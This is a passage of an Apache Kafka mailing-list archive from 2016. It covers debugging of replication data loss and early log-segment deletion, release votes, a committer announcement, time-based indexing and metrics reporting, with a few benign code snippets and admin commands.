> * Tag to be voted upon (off 0.10.1 branch) is the 0.10.1.1-rc1 tag:
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=
> c3638376708ee6c02dfe4e57747acae0126fa6e7
>
>
> Thanks,
> Guozhang
>
> --
> -- Guozhang
>


Re: Investigating apparent data loss during preferred replica election

2016-11-21 Thread Jun Rao
Hi, Mark,

So you did the manual leader election after the cluster had stabilized (i.e.,
all replicas are in sync)? Then, it may not be related to the issue that I
described.

If there is just a single leadership change, what you described shouldn't
happen by design. I modified your steps to the following according to the
design and I am not sure how the message can be lost.

1. Starting point: Leader and Replica both only have up to message #36, HW
is at 37
2. Client produces new message with required.acks=all at offset 37
3. The produce request is blocked
4. Replica fetches messages at offset 37
5. Leader's HW still at 37 and the produce request still blocked
5.1 Replica receives message at 37 and appends it to its local log.
5.2 Replica fetches messages at offset 38
5.3 Leader's HW moves to 38 and the produce request is unblocked
5.4 Replica's HW still at 37
6. PREFERRED REPLICA ELECTION BEGIN
7. Replica becomes leader; no truncation is done; message at offset 37 is
preserved; HW still at 37
8. Connect issues a fetch request at 38 to the replica and gets an empty
response instead of OffsetOutOfRangeException since the log end offset is
at 38.
9. Leader becomes follower; truncates to its HW of 38, keeping the message
at offset 37.
10. Leader starts fetching from offset 38
11. Replica moves HW to 38
12. Message #37 is preserved in both replicas and is not lost
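
As a toy illustration of steps 7 and 9 above (a simplification of the
design, not the broker code; the class and fields are made up):

// Toy model of a replica during the leader transition described above.
class ToyReplica {
    long logEndOffset;   // LEO: the next offset to be written
    long highWatermark;  // HW: the first uncommitted offset

    ToyReplica(long leo, long hw) {
        this.logEndOffset = leo;
        this.highWatermark = hw;
    }

    // Step 7: becoming leader does no truncation; the local log is kept
    // and gets committed as the followers catch up.
    void becomeLeader() {
        // intentionally a no-op on the log
    }

    // Step 9: the old leader truncates to its own HW. With HW = 38,
    // offsets up to and including #37 are kept.
    void becomeFollower() {
        logEndOffset = Math.min(logEndOffset, highWatermark);
    }
}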


BTW, do you have unclean leader election disabled? Is this issue
reproducible? If so, we can enable some debug level logging to see what's
causing this. Now, I am also not sure if this is a broker side issue or a
consumer side issue.

Thanks,

Jun


On Mon, Nov 21, 2016 at 5:20 PM, Mark Smith <m...@qq.is> wrote:

> Jun,
>
> Yeah, I probably have an off-by-one issue in the HW description. I think
> you could pick any number here and the problem remains -- could you read
> through the steps I posted and see if they logically make sense, numbers
> aside?
>
> We definitely lost data in 4 partitions of the 8,000 that were elected,
> and there was only a single election for each partition. We had done a
> rolling restart hours before, but that had finished well beforehand and
> everything was stable. We do not allow automatic election, it's a manual
> process that we initiate after the cluster has stabilized.
>
> So in this case, I still don't think any discussion about
> multiple-failovers is germane to the problem we saw. Each of our partitions
> only had a single failover, and yet 4 of them still truncated committed
> data.
>
> --
> Mark Smith
> m...@qq.is
>
>
> On Mon, Nov 21, 2016, at 05:12 PM, Jun Rao wrote:
>
> Hi, Mark,
>
> Hmm, the committing of a message at offset X is the equivalent of saying
> that the HW is at offset X + 1. So, in your example, if the producer
> publishes a new message at offset 37, this message won't be committed
> (i.e., HW moves to offset 38) until the leader sees the follower fetch from
> offset 38 (not offset 37). At that point, the follower would have received
> message at offset 37 in the fetch response and appended that message to its
> local log. If the follower now becomes the new leader, message at offset 37
> is preserved.
>
> The problem that I described regarding data loss can happen during a
> rolling restart. Suppose that you have 3 replicas A, B, and C. Let's say A
> is the preferred leader, but during the deployment, the leader gets
> moved to replica B at some point and all 3 replicas are in sync. A new
> message is produced at offset 37 and is committed (leader's HW = 38).
> However, the HW in replica A is still at 37. Now, we try to shut down broker
> B and the leader gets moved to replica C. Replica A starts to follow
> replica C and it first truncates to HW 37, which removes the message at
> offset 37. Now, preferred leader logic kicks in and the leadership switches
> again to replica A. Since A doesn't have message at offset 37 any more and
> all followers copy messages from replica A, message at offset 37 is lost.
>
> With KAFKA-3670, in the above example, when shutting down broker B, the
> leader will be directly moved to replica A since it's a preferred replica.
> So the above scenario won't happen.
>
> The more complete fix is in KAFKA-1211. The logic for getting the latest
> generation snapshot is just a proposal and is not in the code base yet.
>
> Thanks,
>
> Jun
>
> On Mon, Nov 21, 2016 at 3:20 PM, Mark Smith <m...@qq.is> wrote:
>
> Jun,
>
> Thanks for the reply!
>
> I am aware the HW won't advance until the in-sync replicas have
> _requested_ the messages. However, I believe the issue is that the
> leader has no guarantee the replicas have _received_ the fetch response.
> There is no second-phase to the commit.
>
> So, in the particular case where a leader transition happens, I believe
>

Re: Investigating apparent data loss during preferred replica election

2016-11-21 Thread Jun Rao
Hi, Mark,

Hmm, the committing of a message at offset X is the equivalent of saying
that the HW is at offset X + 1. So, in your example, if the producer
publishes a new message at offset 37, this message won't be committed
(i.e., HW moves to offset 38) until the leader sees the follower fetch from
offset 38 (not offset 37). At that point, the follower would have received
message at offset 37 in the fetch response and appended that message to its
local log. If the follower now becomes the new leader, message at offset 37
is preserved.

The problem that I described regarding data loss can happen during a
rolling restart. Suppose that you have 3 replicas A, B, and C. Let's say A
is the preferred leader, but during the deployment, the leader gets
moved to replica B at some point and all 3 replicas are in sync. A new
message is produced at offset 37 and is committed (leader's HW = 38).
However, the HW in replica A is still at 37. Now, we try to shut down broker
B and the leader gets moved to replica C. Replica A starts to follow
replica C and it first truncates to HW 37, which removes the message at
offset 37. Now, preferred leader logic kicks in and the leadership switches
again to replica A. Since A doesn't have message at offset 37 any more and
all followers copy messages from replica A, message at offset 37 is lost.

With KAFKA-3670, in the above example, when shutting down broker B, the
leader will be directly moved to replica A since it's a preferred replica.
So the above scenario won't happen.

The more complete fix is in KAFKA-1211. The logic for getting the latest
generation snapshot is just a proposal and is not in the code base yet.

Thanks,

Jun

On Mon, Nov 21, 2016 at 3:20 PM, Mark Smith <m...@qq.is> wrote:

> Jun,
>
> Thanks for the reply!
>
> I am aware the HW won't advance until the in-sync replicas have
> _requested_ the messages. However, I believe the issue is that the
> leader has no guarantee the replicas have _received_ the fetch response.
> There is no second-phase to the commit.
>
> So, in the particular case where a leader transition happens, I believe
> this race condition exists (and I'm happy to be wrong here, but it looks
> feasible and explains the data loss I saw):
>
> 1. Starting point: Leader and Replica both only have up to message #36
> 2. Client produces new message with required.acks=all
> 3. Leader commits message #37, but HW is still #36, the produce request
> is blocked
> 4. Replica fetches messages (leader has RECEIVED the fetch request)
> 5. Leader then advances HW to #37 and unblocks the produce request,
> client believes it's durable
> 6. PREFERRED REPLICA ELECTION BEGIN
> 7. Replica starts become-leader process
> 8. Leader finishes sending fetch response, replica is just now seeing
> message #37
> 9. Replica throws away fetch response from step 4 because it is now
> becoming leader (partition has been removed from partitionMap so it
> looks like data is ignored)
> 10. Leader starts become-follower
> 11. Leader truncates to replica HW offset of #36
> 12. Message #37 was durably committed but is now lost
>
> For the tickets you linked:
>
> https://issues.apache.org/jira/browse/KAFKA-3670
> * There was no shutdown involved in this case, so this shouldn't be
> impacting.
>
> https://issues.apache.org/jira/browse/KAFKA-1211
> * I've read through this but I'm not entirely sure if it addresses the
> above. I don't think it does, though. I don't see a step in the ticket
> about become-leader making a call to the old leader to get the latest
> generation snapshot?
>
> --
> Mark Smith
> m...@qq.is
>
> On Fri, Nov 18, 2016, at 10:52 AM, Jun Rao wrote:
> > Mark,
> >
> > Thanks for reporting this. First, a clarification. The HW is actually
> > never
> > advanced until all in-sync followers have fetched the corresponding
> > message. For example, in step 2, if all follower replicas issue a fetch
> > request at offset 10, it serves as an indication that all replicas have
> > received messages up to offset 9. So, only then, the HW is advanced to
> > offset 10 (which is not inclusive).
> >
> > I think the problem that you are seeing is probably caused by two known
> > issues. The first one is
> > https://issues.apache.org/jira/browse/KAFKA-1211.
> > The issue is that the HW is propagated asynchronously from the leader to
> > the followers. If the leadership changes multiple times very quickly, what
> > can happen is that a follower first truncates its data up to HW and then
> > immediately becomes the new leader. Since the follower's HW may not be up
> > to date, some previously committed messages could be lost. The second one
> > is https://issues.apache.org/jira/browse/KAFKA-3670. The issue is that
> > controlled 

Re: Investigating apparent data loss during preferred replica election

2016-11-18 Thread Jun Rao
Mark,

Thanks for reporting this. First, a clarification. The HW is actually never
advanced until all in-sync followers have fetched the corresponding
message. For example, in step 2, if all follower replicas issue a fetch
request at offset 10, it serves as an indication that all replicas have
received messages up to offset 9. So, only then, the HW is advanced to
offset 10 (which is not inclusive).

I think the problem that you are seeing is probably caused by two known
issues. The first one is https://issues.apache.org/jira/browse/KAFKA-1211.
The issue is that the HW is propagated asynchronously from the leader to
the followers. If the leadership changes multiple times very quickly, what
can happen is that a follower first truncates its data up to HW and then
immediately becomes the new leader. Since the follower's HW may not be up
to date, some previously committed messages could be lost. The second one
is https://issues.apache.org/jira/browse/KAFKA-3670. The issue is that
controlled shutdown and leader balancing can cause leadership to change
more than once quickly, which could expose the data loss problem in the
first issue.

The second issue has been fixed in 0.10.0. So, if you upgrade to that
version or above, it should reduce the chance of hitting the first issue
significantly. We are actively working on the first issue and hopefully it
will be addressed in the next release.

Jun

On Thu, Nov 17, 2016 at 5:39 PM, Mark Smith  wrote:

> Hey folks,
>
> I work at Dropbox and I was doing some maintenance yesterday and it
> looks like we lost some committed data during a preferred replica
> election. As far as I understand this shouldn't happen, but I have a
> theory and want to run it by ya'll.
>
> Preamble:
> * Kafka 0.9.0.1
> * required.acks = -1 (All)
> * min.insync.replicas = 2 (only 2 replicas for the partition, so we
> require both to have the data)
> * consumer is Kafka Connect
> * 1400 topics, total of about 15,000 partitions
> * 30 brokers
>
> I was performing some rolling restarts of brokers yesterday as part of
> our regular DRT (disaster testing) process and at the end that always
> leaves many partitions that need to be failed back to the preferred
> replica. There were about 8,000 partitions that needed moving. I started
> the election in Kafka Manager and it worked, but it looks like 4 of
> those 8,000 partitions experienced some relatively small amount of data
> loss at the tail.
>
> From the Kafka Connect point of view, we saw a handful of these:
>
> [2016-11-17 02:55:26,513] [WorkerSinkTask-clogger-analytics-staging-8-5]
> INFO Fetch offset 67614479952 is out of range, resetting offset
> (o.a.k.c.c.i.Fetcher:595)
>
> I believe that was because it asked the new leader for data and the new
> leader had less data than the old leader. Indeed, the old leader became
> a follower and immediately truncated:
>
> 2016-11-17 02:55:27,237 INFO log.Log: Truncating log
> goscribe.client-host_activity-21 to offset 67614479601.
>
> Given the above production settings I don't know why KC would ever see
> an OffsetOutOfRange error but this caused KC to reset to the beginning
> of the partition. Various broker logs for the failover paint the
> following timeline:
> https://gist.github.com/zorkian/d80a4eb288d40c1ee7fb5d2d340986d6
>
> My current working theory that I'd love eyes on:
>
>   1. Leader receives produce request and appends to log, incrementing
>   LEO, but given the durability requirements the HW is not incremented
>   and the produce response is delayed (normal)
>
>   2. Replica sends Fetch request to leader as part of normal replication
>   flow
>
>   3. Leader increments HW when it STARTS to respond to the Fetch request
>   (per fetchMessages in ReplicaManager.scala), so the HW is updated as
>   soon as we've prepared messages for response -- importantly the HW is
>   updated even though the replica has not yet actually seen the
>   messages, even given the durability settings we've got
>
>   4. Meanwhile, Kafka Connect sends Fetch request to leader and receives
>   the messages below the new HW, but the messages have not actually been
>   received by the replica yet still
>
>   5. Preferred replica election begins (oh the travesty!)
>
>   6. Replica starts the become-leader process and makeLeader removes
>   this partition from partitionMap, which means when the response comes
>   in finally, we ignore it (we discard the old-leader committed
>   messages)
>
>   7. Old-leader starts become-follower process and truncates to the HW
>   of the new-leader i.e. the old-leader has now thrown away data it had
>   committed and given out moments ago
>
>   8. Kafka Connect sends Fetch request to the new-leader but its offset
>   is now greater than the HW of the new-leader, so we get the
>   OffsetOutOfRange error and restart
>
> Can someone tell me whether or not this is plausible? If it is, is there
> a known issue/bug filed for it? I'm not exactly sure what the solution
> is, but it 

Re: Segments being deleted too early after upgrading 0.9.0.1 to 0.10.1.0

2016-11-01 Thread Jun Rao
Hi, James,

That's a good point. KAFKA-3802 should cause the log segments to be kept
longer, not shorter. So, there is probably something else that's causing
this behavior. Could you try to reproduce this? When you do that, one thing
you could try is to set log.segment.delete.delay.ms to a larger value. This
will keep the segments scheduled for deletion around longer as .deleted
files. Then, when deletion is triggered, you can check the last modified
time of those .deleted files and run the following command to check the
content of the .timeindex file. The content of the .timeindex file should
be empty, which means log retention will be using the last modified time.

bin/kafka-run-class.sh kafka.tools.DumpLogSegments --files
/tmp/kafka-logs/test-0/.timeindex

Thanks,

Jun

On Mon, Oct 31, 2016 at 5:17 PM, James Brown <jbr...@easypost.com> wrote:

> KAFKA-3802 does seem plausible; I had to restart the brokers again after
> the 0.10.1.0 upgrade to change some JVM settings; maybe that touched the
> mtime on the files? Not sure why that would make them *more* likely to be
> deleted, though, since their mtime should've gone into the future, not into
> the past...
>
> On Mon, Oct 31, 2016 at 5:02 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Hi, James,
> >
> > Thanks for testing and reporting this. What you observed is actually not
> > the expected behavior in 0.10.1 based on the design. The way that
> retention
> > works in 0.10.1 is that if a log segment has at least one message with a
> > timestamp, we will use the largest timestamp in that segment to determine
> > if the segment should be retained. If no message in a segment has a
> > timestamp (which is your case), we will fall back to use the last
> modified
> > time of the segment, which is the old behavior.
> >
> > I tested this locally and didn't see old log segments being deleted
> > immediately after upgrade. It's also a bit weird that you only saw that
> in
> > the leader broker. The retention logic is orthogonal to a replica being a
> > leader or a follower.
> >
> > I am wondering if you could be hitting
> > https://issues.apache.org/jira/browse/KAFKA-3802 ? If not, is there a
> way
> > to reproduce this reliably?
> >
> > Jun
> >
> > On Mon, Oct 31, 2016 at 4:14 PM, James Brown <jbr...@easypost.com>
> wrote:
> >
> > > I just finished upgrading our main production cluster to 0.10.1.0 (from
> > > 0.9.0.1) with an on-line rolling upgrade, and I noticed something
> > strange —
> > > the leader for one of our big partitions just decided to expire all of
> > the
> > > logs from before the upgrade. I have log.retention.hours set to 336 in
> my
> > > config, and the replicas still have data going back to October 17, but
> > > after restarting for 0.10.1.0, the topic leader deleted all segments
> more
> > > than a couple of hours old (approximately 2TB of data on that box).
> > >
> > > inter.broker.protocol.version and log.message.format.version are both
> > still
> > > set to 0.9.0.1 in my config
> > >
> > > Before the upgrade, the oldest available offset in this topic/partition
> > > was 812555925; now it's 848947551.
> > >
> > > I assume this is some bug with upgrading to 0.10.1.0 when the extant
> data
> > > doesn't have any associated timestamps, but it seems, uh, really
> > > unexpected, and if I'd had any consumers which were behind, I could've
> > > ended up losing quite a lot of data here. It's particularly bizarre
> that
> > > this didn't affect anything except the leader (yet).
> > >
> > > It may be that this is expected behavior, but I guess I just assumed
> that
> > > the code would fall back to using the mtime if timestamps were not
> > present
> > > in the log rather than assuming that the timestamp of a given segment
> was
> > > 0. If this is expected behavior, I would recommend adding a specific
> note
> > > to the "Potential breaking changes in 0.10.1.0" section of the manual
> > > indicating that upgrading from 0.9.0.1 might immediately truncate all
> of
> > > your data.
> > >
> > >
> > > Debugging output is below:
> > >
> > >
> > > % kafka-topics.sh --zookeeper localhost:40169 --describe  --topic
> > > easypost.request_log
> > > Topic:easypost.request_log PartitionCount:4 ReplicationFactor:3
> Configs:
> > > Topic: easypost.request_log Partition: 0 Leader: 1 Replicas: 1,4,2 Isr:
> > > 4,2,1
> > > Topic: easypost.request_lo

Re: Segments being deleted too early after upgrading 0.9.0.1 to 0.10.1.0

2016-10-31 Thread Jun Rao
Hi, James,

Thanks for testing and reporting this. What you observed is actually not
the expected behavior in 0.10.1 based on the design. The way that retention
works in 0.10.1 is that if a log segment has at least one message with a
timestamp, we will use the largest timestamp in that segment to determine
if the segment should be retained. If no message in a segment has a
timestamp (which is your case), we will fall back to using the last modified
time of the segment, which is the old behavior.
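
A sketch of the retention rule as described (illustrative only; this is not
the actual broker code, and the "no timestamp" sentinel here is made up):

import java.io.File;

// Illustrative sketch of the 0.10.1 retention rule described above.
class RetentionCheck {
    // largestTimestamp <= 0 stands in for "no message carried a timestamp"
    static boolean shouldDelete(File segmentFile, long largestTimestamp,
                                long retentionMs, long nowMs) {
        long effectiveTs = largestTimestamp > 0
                ? largestTimestamp            // max message timestamp in segment
                : segmentFile.lastModified(); // fall back to mtime (old behavior)
        return nowMs - effectiveTs > retentionMs;
    }
}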

I tested this locally and didn't see old log segments being deleted
immediately after upgrade. It's also a bit weird that you only saw that in
the leader broker. The retention logic is orthogonal to a replica being a
leader or a follower.

I am wondering if you could be hitting
https://issues.apache.org/jira/browse/KAFKA-3802 ? If not, is there a way
to reproduce this reliably?

Jun

On Mon, Oct 31, 2016 at 4:14 PM, James Brown  wrote:

> I just finished upgrading our main production cluster to 0.10.1.0 (from
> 0.9.0.1) with an on-line rolling upgrade, and I noticed something strange —
> the leader for one of our big partitions just decided to expire all of the
> logs from before the upgrade. I have log.retention.hours set to 336 in my
> config, and the replicas still have data going back to October 17, but
> after restarting for 0.10.1.0, the topic leader deleted all segments more
> than a couple of hours old (approximately 2TB of data on that box).
>
> inter.broker.protocol.version and log.message.format.version are both still
> set to 0.9.0.1 in my config
>
> Before the upgrade, the oldest available offset in this topic/partition
> was 812555925; now it's 848947551.
>
> I assume this is some bug with upgrading to 0.10.1.0 when the extant data
> doesn't have any associated timestamps, but it seems, uh, really
> unexpected, and if I'd had any consumers which were behind, I could've
> ended up losing quite a lot of data here. It's particularly bizarre that
> this didn't affect anything except the leader (yet).
>
> It may be that this is expected behavior, but I guess I just assumed that
> the code would fall back to using the mtime if timestamps were not present
> in the log rather than assuming that the timestamp of a given segment was
> 0. If this is expected behavior, I would recommend adding a specific note
> to the "Potential breaking changes in 0.10.1.0" section of the manual
> indicating that upgrading from 0.9.0.1 might immediately truncate all of
> your data.
>
>
> Debugging output is below:
>
>
> % kafka-topics.sh --zookeeper localhost:40169 --describe  --topic
> easypost.request_log
> Topic:easypost.request_log PartitionCount:4 ReplicationFactor:3 Configs:
> Topic: easypost.request_log Partition: 0 Leader: 1 Replicas: 1,4,2 Isr:
> 4,2,1
> Topic: easypost.request_log Partition: 1 Leader: 4 Replicas: 4,1,2 Isr:
> 4,2,1
> Topic: easypost.request_log Partition: 2 Leader: 5 Replicas: 5,2,3 Isr:
> 5,3,2
> Topic: easypost.request_log Partition: 3 Leader: 3 Replicas: 3,5,2 Isr:
> 5,3,2
>
> (on broker #1):
>
> % ls -l /srv/var/kafka/logs/easypost.request_log-0/ | wc -l
> 25
>
> (on broker #4):
>
> % ls -l /srv/var/kafka/logs/easypost.request_log-0/ | wc -l
> 3391
>
>
> When the actual deletion occurred, there were no errors in the log; just a
> lot of messages like
>
> INFO Scheduling log segment 811849601 for log easypost.request_log-0 for
> deletion. (kafka.log.Log)
>
>
> I suspect it's too late to undo anything related to this, and I don't
> actually think any of our consumers were relying on this data, but I
> figured I'd send along this report and see if anybody else has seen
> behavior like this.
>
> Thanks,
> --
> James Brown
> Engineer
>


Re: [ANNOUNCE] New committer: Jiangjie (Becket) Qin

2016-10-31 Thread Jun Rao
Congratulations, Jiangjie. Thanks for all your contributions to Kafka.

Jun

On Mon, Oct 31, 2016 at 10:35 AM, Joel Koshy  wrote:

> The PMC for Apache Kafka has invited Jiangjie (Becket) Qin to join as a
> committer and we are pleased to announce that he has accepted!
>
> Becket has made significant contributions to Kafka over the last two years.
> He has been deeply involved in a broad range of KIP discussions and has
> contributed several major features to the project. He recently completed
> the implementation of a series of improvements (KIP-31, KIP-32, KIP-33) to
> Kafka’s message format that address a number of long-standing issues such
> as avoiding server-side re-compression, better accuracy for time-based log
> retention, log roll and time-based indexing of messages.
>
> Congratulations Becket! Thank you for your many contributions. We are
> excited to have you on board as a committer and look forward to your
> continued participation!
>
> Joel
>


Re: [VOTE] Add REST Server to Apache Kafka

2016-10-25 Thread Jun Rao
Sorry, a typo. -1 instead.

Thanks,

Jun

On Tue, Oct 25, 2016 at 4:24 PM, Jun Rao <j...@confluent.io> wrote:

> +1
>
> Thanks,
>
> Jun
>
> On Tue, Oct 25, 2016 at 2:16 PM, Harsha Chintalapani <ka...@harsha.io>
> wrote:
>
>> Hi All,
>>We are proposing to have a REST Server as part of  Apache Kafka
>> to provide producer/consumer/admin APIs. We Strongly believe having
>> REST server functionality with Apache Kafka will help a lot of users.
>> Here is the KIP that Mani Kumar wrote
>> https://cwiki.apache.org/confluence/display/KAFKA/KIP-80:+
>> Kafka+Rest+Server.
>> There is a discussion thread in dev list that had differing opinions on
>> whether to include REST server in Apache Kafka or not. You can read more
>> about that in this thread
>> http://mail-archives.apache.org/mod_mbox/kafka-dev/201610.mb
>> ox/%3CCAMVt_AyMqeuDM39ZnSXGKtPDdE46sowmqhsXoP-+JMBCUV74Dw@
>> mail.gmail.com%3E
>>
>>   This is a VOTE thread to check interest in the community for
>> adding REST Server implementation in Apache Kafka.
>>
>> Thanks,
>> Harsha
>>
>
>


Re: [VOTE] Add REST Server to Apache Kafka

2016-10-25 Thread Jun Rao
+1

Thanks,

Jun

On Tue, Oct 25, 2016 at 2:16 PM, Harsha Chintalapani 
wrote:

> Hi All,
>We are proposing to have a REST Server as part of Apache Kafka
> to provide producer/consumer/admin APIs. We strongly believe having
> REST server functionality with Apache Kafka will help a lot of users.
> Here is the KIP that Mani Kumar wrote
> https://cwiki.apache.org/confluence/display/KAFKA/KIP-
> 80:+Kafka+Rest+Server.
> There is a discussion thread in dev list that had differing opinions on
> whether to include REST server in Apache Kafka or not. You can read more
> about that in this thread
> http://mail-archives.apache.org/mod_mbox/kafka-dev/201610.mbox/%3CCAMVt_
> aymqeudm39znsxgktpdde46sowmqhsxop-+jmbcuv7...@mail.gmail.com%3E
>
>   This is a VOTE thread to check interest in the community for
> adding REST Server implementation in Apache Kafka.
>
> Thanks,
> Harsha
>


Re: [kafka-clients] [VOTE] 0.10.1.0 RC3

2016-10-17 Thread Jun Rao
Thanks for preparing the release. Verified quickstart on the Scala 2.11
binary. +1

Jun

On Fri, Oct 14, 2016 at 4:29 PM, Jason Gustafson  wrote:

> Hello Kafka users, developers and client-developers,
>
> One more RC for 0.10.1.0. We're hoping this is the final one so that we
> can meet the release target date of Oct. 17 (Monday). Please let me know as
> soon as possible if you find any major problems.
>
> Release plan: https://cwiki.apache.org/confluence/display/KAFKA/Rele
> ase+Plan+0.10.1.
>
> Release notes for the 0.10.1.0 release:
> http://home.apache.org/~jgus/kafka-0.10.1.0-rc3/RELEASE_NOTES.html
>
> *** Please download, test and vote by Monday, Oct 17, 5pm PT
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~jgus/kafka-0.10.1.0-rc3/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~jgus/kafka-0.10.1.0-rc3/javadoc/
>
> * Tag to be voted upon (off 0.10.1 branch) is the 0.10.1.0-rc3 tag:
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=
> 50f30a44f31fca1bd9189d2814388d51bd56b06b
>
> * Documentation:
> http://kafka.apache.org/0101/documentation.html
>
> * Protocol:
> http://kafka.apache.org/0101/protocol.html
>
> * Tests:
> Unit tests: https://builds.apache.org/job/kafka-0.10.1-jdk7/71/
> System tests: http://testing.confluent.io/confluent-kafka-
> 0-10-1-system-test-results/?prefix=2016-10-13--001.
> 1476369986--apache--0.10.1--ee212d1/
>
> (Note that these tests do not include a couple patches merged today. I
> will send links to updated test builds as soon as they are available)
>
> Thanks,
>
> Jason
>
>


Re: KIP-33 Opt out from Time Based indexing

2016-09-06 Thread Jun Rao
Jan,

For the time rolling issue, Jiangjie has committed a fix (
https://issues.apache.org/jira/browse/KAFKA-4099) to trunk. Perhaps you can
help test out trunk and see if there are any other issues related to
time-based index?

Thanks,

Jun

On Mon, Sep 5, 2016 at 11:52 PM, Jan Filipiak <jan.filip...@trivago.com>
wrote:

> Hi Jun,
>
> sorry for the late reply. Regarding B, my main concern was just complexity
> of understanding what's going on.
> As you can see it took me probably some 2 days or so to fully grasp all
> the details in the implementation and what
> the impacts are. Usually I prefer to turn things I don't use off, so I
> don't have to bother. Log Append time will work for me.
>
> Rolling logs was my main concern. The producer can specify the timestamp
> and we use epoch inside the message, I'd bet money,
> people in the company would have put this epoch also in the produce
> record. => rolling logs, as the broker thinks it's millis.
> So that would probably have caused us at least one outage if a big
> producer had upgraded and done this, IMO a likely mistake.
>
> I'd just hoped for a more obvious kill-switch, so I didn’t need to bother
> that much.
>
> Best Jan
>
>
>
>
>
> On 29.08.2016 19:36, Jun Rao wrote:
>
>> Jan,
>>
>> For the usefulness of time index, it's ok if you don't plan to use it.
>> However, I do think there are other people who will want to use it. Fixing
>> an application bug always requires some additional work. Intuitively,
>> being
>> able to seek back to a particular point of time for replay is going to be
>> much more efficient than always replaying from the very beginning,
>> especially when the log is retained for a long period of time. Sure, if
>> you
>> want to have more confidence, you want to rewind a bit conservatively. But
>> being able to rewind an extra hour makes a big difference from having to
>> rewind all to way to 7 days or however long the retention time is.
>>
>> For the OffsetRequest, I actually agree with you that it's useful. People
>> can use that to find the first and the last offset and the offset based on
>> a specific point in time. The part that's a bit awkward with OffsetRequest
>> is that it's based on the last modified time of the log segment, which
>> makes it imprecise (precision is at the segment level, not message level)
>> and non-deterministic (last modified time may change). Another awkwardness
>> is that it supports returning a list of offsets after a specified
>> timestamp. We did that simply because timestamp was only at the segment
>> level then. So, our plan is to replace OffsetRequest with a new one. It
>> will give you the same functionality: find the first and the last offset
>> and the offset based on a specific point in time. It will just be better
>> since it's more precise and more deterministic. For your use case, it
>> seems
>> that you don't care about message creation time. Then, it's possible for
>> you to configure the broker with the log append time. Whether this should
>> be default at the Kafka level is debatable, but it won't prevent your use
>> case.
>>
>> For your suggestion on refactoring, I still want to understand how
>> necessary it is. Your main concerns so far seem to be.
>> (a) Impact on rolling log segments.
>> (b) Time-based index is not useful for me.
>>
>> Item (a) is a good point. Thanks for that. We will fix it. Item (b), I
>> have
>> given my view on this above. Are there any other ways that you think
>> having a time-based index will hurt?
>>
>> Thanks,
>>
>> Jun
>>
>> On Fri, Aug 26, 2016 at 3:41 PM, Jan Filipiak <jan.filip...@trivago.com>
>> wrote:
>>
>> Hi Jun,
>>>
>>> thanks for taking the time to answer on such a detailed level. You are
>>> right Log.fetchOffsetByTimestamp works, the comment is just confusing
>>> "// Get all the segments whose largest timestamp is smaller than target
>>> timestamp" wich is apparently is not what takeWhile does (I am more on
>>> the Java end of things, so I relied on the comment).
>>>
>>> Regarding the frequent file rolling i didn't think of Logcompaction but
>>> that indeed is a place where  can hit the fan pretty easy. especially
>>> if you don't have many updates in there and you pass the timestamp along
>>> in
>>> a kafka-streams application. Bootstrapping a new application then indeed
>>> could produce quite a few old messages kicking this logrolling of until a
>>> recent message appears. I guess that makes it a prac

Re: Kafka 0.10.0 MetricsReporter implementation only reporting zeros

2016-09-06 Thread Jun Rao
Michael,

One thing to be aware of is that if the producer stops sending messages, some
of the metrics will be reset to 0 after the metric window elapses. Do you
see metric values reported in the reporter that differ from those in jconsole?
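
For reference, a minimal reporter against the 0.10.0 interface looks roughly
like this (a sketch with System.out in place of real logging):

import java.util.List;
import java.util.Map;
import org.apache.kafka.common.metrics.KafkaMetric;
import org.apache.kafka.common.metrics.MetricsReporter;

public class LoggingMetricsReporter implements MetricsReporter {
    @Override
    public void configure(Map<String, ?> configs) {}

    @Override
    public void init(List<KafkaMetric> metrics) {
        // Called once with the metrics that already exist at startup; most
        // values are 0.0 here because nothing has been recorded yet.
        for (KafkaMetric m : metrics) {
            System.out.println(m.metricName() + " = " + m.value());
        }
    }

    @Override
    public void metricChange(KafkaMetric metric) {
        // Called when a metric is added or reconfigured, not on every
        // recorded sample -- so a reporter that only logs in callbacks will
        // mostly see initial values. To report ongoing values, keep the
        // KafkaMetric references and sample metric.value() periodically
        // from your own thread.
        System.out.println("metric registered: " + metric.metricName());
    }

    @Override
    public void metricRemoval(KafkaMetric metric) {
        System.out.println("metric removed: " + metric.metricName());
    }

    @Override
    public void close() {}
}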

Thanks,

Jun

On Tue, Sep 6, 2016 at 3:03 PM, Michael Ross  wrote:

> I have a very simple Metrics Reporter that implements the Kafka 0.10.0
> MetricsReporter interface, that takes in the metrics as a parameter and
> logs them. When a producer starts to send messages, I can see that it is
> correctly configured to use the Metrics Reporter I created because it
> starts to log, but it only seems to log in the beginning around
> initialization and almost every value seems to be 0.0 or negative infinity
> (besides available buffer, metadata-age, and the metric count starts at 1.0
> after initialization). It also stops receiving metrics after a very short
> time after startup. When looking at the JMX Metrics Reporting on a server
> running my Kafka setup, all of the values exist, which makes it clear that
> the 0.0s are not expected output.
>
> After exploring this problem for a while, it looks like this has nothing
> to do with the implementation of the Metrics Reporter and more to do with
> some configuration issue or understanding around how Metrics Reporting
> works.
>
> Thanks,
>
> Mike
>


Re: KIP-33 Opt out from Time Based indexing

2016-08-29 Thread Jun Rao
Jiangjie,

Good point on the time index format related to uncompressed messages. It
does seem that indexing based on file position requires a bit more
complexity. Since the time index is going to be used infrequently, having a
level of indirection doesn't seem a big concern. So, we can leave the logic
as it is.
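
(As a client-side illustration of what the time index ultimately enables:
the timestamp-based offset lookup being added to the Java consumer. A
sketch only; the topic name and bootstrap address below are made up.)

import java.util.Collections;
import java.util.Map;
import java.util.Properties;
import org.apache.kafka.clients.consumer.KafkaConsumer;
import org.apache.kafka.clients.consumer.OffsetAndTimestamp;
import org.apache.kafka.common.TopicPartition;

public class SeekByTimestamp {
    public static void main(String[] args) {
        Properties props = new Properties();
        props.put("bootstrap.servers", "localhost:9092");
        props.put("group.id", "rewind-example");
        props.put("key.deserializer",
            "org.apache.kafka.common.serialization.ByteArrayDeserializer");
        props.put("value.deserializer",
            "org.apache.kafka.common.serialization.ByteArrayDeserializer");

        // Rewind one hour instead of replaying the whole retention window.
        long oneHourAgo = System.currentTimeMillis() - 60 * 60 * 1000L;
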